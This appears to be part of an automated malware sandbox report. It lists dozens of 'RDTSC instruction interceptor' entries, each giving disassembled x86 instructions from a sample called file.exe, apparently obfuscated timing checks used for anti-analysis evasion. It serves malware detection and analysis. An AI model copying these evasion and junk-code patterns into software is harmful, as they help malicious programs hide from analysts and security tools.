Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0397 second address: CA041C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4E9056F60h 0x00000008 jmp 00007FC4E9056F5Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007FC4E9056F58h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Ch 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov dword ptr [ebp+122D1BB9h], edi 0x00000033 push 00000000h 0x00000035 mov esi, dword ptr [ebp+122D3785h] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007FC4E9056F58h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000016h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 mov dword ptr [ebp+122D1975h], eax 0x0000005d xchg eax, ebx 0x0000005e push esi 0x0000005f pushad 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA041C second address: CA0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0F71 second address: CA0F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0F75 second address: CA0F8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA0F8F second address: CA0F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA1955 second address: CA195C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA3884 second address: CA3895 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC4E9056F56h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63D5A second address: C63D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C63D5E second address: C63D64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA675F second address: CA6763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6763 second address: CA676B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA676B second address: CA6789 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE389h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA6789 second address: CA678F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA84BC second address: CA84C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA84C3 second address: CA84E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007FC4E9056F5Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA84E9 second address: CA84EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA84EF second address: CA84F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA20BD second address: CA20D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE37Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99C5 second address: CA99C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA99C9 second address: CA9A55 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC4E87CE387h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007FC4E87CE37Eh 0x00000012 nop 0x00000013 call 00007FC4E87CE380h 0x00000018 pop edi 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+122D2CE5h] 0x00000021 push 00000000h 0x00000023 mov ebx, dword ptr [ebp+122D2CC1h] 0x00000029 xchg eax, esi 0x0000002a pushad 0x0000002b jmp 00007FC4E87CE387h 0x00000030 pushad 0x00000031 jmp 00007FC4E87CE388h 0x00000036 push ecx 0x00000037 pop ecx 0x00000038 popad 0x00000039 popad 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push edx 0x00000040 pop edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA9A55 second address: CA9A5F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAAB3C second address: CAAB53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E87CE383h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA8BA6 second address: CA8C3F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FC4E9056F58h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 movsx ebx, dx 0x00000027 push dword ptr fs:[00000000h] 0x0000002e je 00007FC4E9056F5Ch 0x00000034 and ebx, 3E9A501Dh 0x0000003a mov dword ptr fs:[00000000h], esp 0x00000041 mov dword ptr [ebp+1246122Eh], ecx 0x00000047 mov eax, dword ptr [ebp+122D0395h] 0x0000004d add edi, 5F6D60A0h 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebp 0x00000058 call 00007FC4E9056F58h 0x0000005d pop ebp 0x0000005e mov dword ptr [esp+04h], ebp 0x00000062 add dword ptr [esp+04h], 00000017h 0x0000006a inc ebp 0x0000006b push ebp 0x0000006c ret 0x0000006d pop ebp 0x0000006e ret 0x0000006f nop 0x00000070 jnp 00007FC4E9056F60h 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 push ebx 0x0000007a jmp 00007FC4E9056F5Bh 0x0000007f pop ebx 0x00000080 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACBFE second address: CACC49 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FC4E87CE378h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 push 00000000h 0x00000023 add dword ptr [ebp+122D18C9h], ebx 0x00000029 mov di, ax 0x0000002c push 00000000h 0x0000002e push edx 0x0000002f jp 00007FC4E87CE37Ch 0x00000035 jo 00007FC4E87CE376h 0x0000003b pop edi 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACC49 second address: CACC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACC4E second address: CACC63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC4E87CE381h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6229B second address: C622B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Ch 0x00000007 push edi 0x00000008 jns 00007FC4E9056F56h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACD68 second address: CACD6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACD6E second address: CACD7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CACD7C second address: CACD81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAEFC2 second address: CAEFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAEFC6 second address: CAEFCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAEFCC second address: CAEFD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAEFD2 second address: CAEFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAEFD6 second address: CAEFDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAEFDA second address: CAF069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC4E87CE388h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FC4E87CE378h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov bx, 0576h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 mov ebx, dword ptr [ebp+122D2BA9h] 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 mov edi, dword ptr [ebp+122D34A8h] 0x0000003f xchg eax, esi 0x00000040 jmp 00007FC4E87CE380h 0x00000045 push eax 0x00000046 pushad 0x00000047 pushad 0x00000048 jnc 00007FC4E87CE376h 0x0000004e jmp 00007FC4E87CE384h 0x00000053 popad 0x00000054 jo 00007FC4E87CE37Ch 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CAFF65 second address: CAFFBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FC4E9056F5Fh 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D3760h], ecx 0x00000016 jmp 00007FC4E9056F5Ch 0x0000001b push 00000000h 0x0000001d call 00007FC4E9056F5Eh 0x00000022 and ebx, dword ptr [ebp+122D2CB9h] 0x00000028 pop ebx 0x00000029 sub bh, 00000076h 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FC4E9056F5Ch 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1084 second address: CB1118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC4E87CE382h 0x0000000a popad 0x0000000b nop 0x0000000c add bl, FFFFFFB3h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FC4E87CE378h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 00000018h 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b mov ebx, edx 0x0000002d push 00000000h 0x0000002f push 00000000h 0x00000031 push edx 0x00000032 call 00007FC4E87CE378h 0x00000037 pop edx 0x00000038 mov dword ptr [esp+04h], edx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc edx 0x00000045 push edx 0x00000046 ret 0x00000047 pop edx 0x00000048 ret 0x00000049 movzx edi, cx 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e jmp 00007FC4E87CE37Fh 0x00000053 pop eax 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jnp 00007FC4E87CE387h 0x0000005d jmp 00007FC4E87CE381h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1118 second address: CB111F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1315 second address: CB1338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC4E87CE376h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC4E87CE380h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB1338 second address: CB1342 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB308C second address: CB30F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE37Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FC4E87CE378h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 jmp 00007FC4E87CE389h 0x00000029 mov bx, F3F9h 0x0000002d push 00000000h 0x0000002f push ebx 0x00000030 sub dword ptr [ebp+122D2E81h], ebx 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 jmp 00007FC4E87CE37Bh 0x0000003e xchg eax, esi 0x0000003f push ecx 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB52D1 second address: CB52D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB52D9 second address: CB52EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 jl 00007FC4E87CE37Eh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4322 second address: CB4335 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FC4E9056F56h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4335 second address: CB4344 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE37Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB54AA second address: CB54AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4344 second address: CB434A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB21A6 second address: CB21CC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC4E9056F67h 0x00000008 jmp 00007FC4E9056F61h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 jng 00007FC4E9056F56h 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB83EC second address: CB8452 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC4E87CE37Ch 0x00000008 jl 00007FC4E87CE376h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FC4E87CE37Dh 0x00000016 nop 0x00000017 js 00007FC4E87CE37Ch 0x0000001d push 00000000h 0x0000001f mov dword ptr [ebp+122D3060h], ecx 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FC4E87CE378h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000017h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 push eax 0x00000042 pushad 0x00000043 jne 00007FC4E87CE378h 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FC4E87CE376h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB4419 second address: CB441D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB8452 second address: CB8456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB73F8 second address: CB73FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB73FD second address: CB7408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC4E87CE376h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6492 second address: CB6497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB6497 second address: CB64AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4E87CE381h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB7408 second address: CB7484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a adc edi, 00014251h 0x00000010 mov bl, 45h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FC4E9056F58h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007FC4E9056F58h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000017h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov bh, al 0x00000056 mov eax, dword ptr [ebp+122D04CDh] 0x0000005c sub ebx, dword ptr [ebp+122D2AB9h] 0x00000062 push FFFFFFFFh 0x00000064 mov bh, cl 0x00000066 nop 0x00000067 push eax 0x00000068 push edx 0x00000069 push esi 0x0000006a jg 00007FC4E9056F56h 0x00000070 pop esi 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB862F second address: CB8634 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB94C3 second address: CB94C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CB94C9 second address: CB94D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007FC4E87CE376h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBE816 second address: CBE81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBE81B second address: CBE821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBE821 second address: CBE825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CBE825 second address: CBE844 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC4E87CE384h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1D6E second address: CC1DA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC4E9056F5Eh 0x0000000c jnc 00007FC4E9056F5Ch 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC4E9056F63h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1DA8 second address: CC1DB2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC1DB2 second address: CC1DD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E9056F5Fh 0x00000007 pushad 0x00000008 jmp 00007FC4E9056F62h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC7547 second address: CC754D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC76AC second address: CC76B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC76B0 second address: CC76CA instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4E87CE376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC4E87CE37Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC776C second address: CC77A6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC4E9056F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC4E9056F69h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007FC4E9056F5Fh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC77A6 second address: CC77E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4E87CE384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e jmp 00007FC4E87CE37Ch 0x00000013 pop esi 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jo 00007FC4E87CE376h 0x0000001f jc 00007FC4E87CE376h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CC77E2 second address: CC7800 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c pushad 0x0000000d jmp 00007FC4E9056F5Eh 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
